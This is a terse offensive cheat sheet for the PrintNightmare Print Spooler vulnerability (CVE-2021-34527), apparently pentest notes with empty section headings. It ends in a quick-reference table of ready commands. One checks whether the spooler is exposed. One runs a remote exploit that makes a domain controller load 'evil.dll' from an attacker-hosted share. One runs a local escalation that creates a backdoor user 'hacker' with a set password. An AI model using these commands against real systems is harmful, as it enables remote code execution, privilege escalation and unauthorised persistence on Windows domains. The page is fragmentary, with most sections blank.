Overview
CVE-2021-34527. Load malicious DLL via Print Spooler service. Variants: RCE (remote) and LPE (local privilege escalation).Check Spooler Running
RCE — Remote
Host DLL
Exploit
LPE — Local Privilege Escalation
Mimikatz Method
Quick Reference
| Task | Command |
|---|---|
| Check spooler | rpcdump DC_IP | grep spoolsv |
| RCE | CVE-2021-1675.py DOMAIN/user:pass@DC '\\ATK\share\evil.dll' |
| LPE | Invoke-Nightmare -NewUser hacker -NewPassword Pass123! |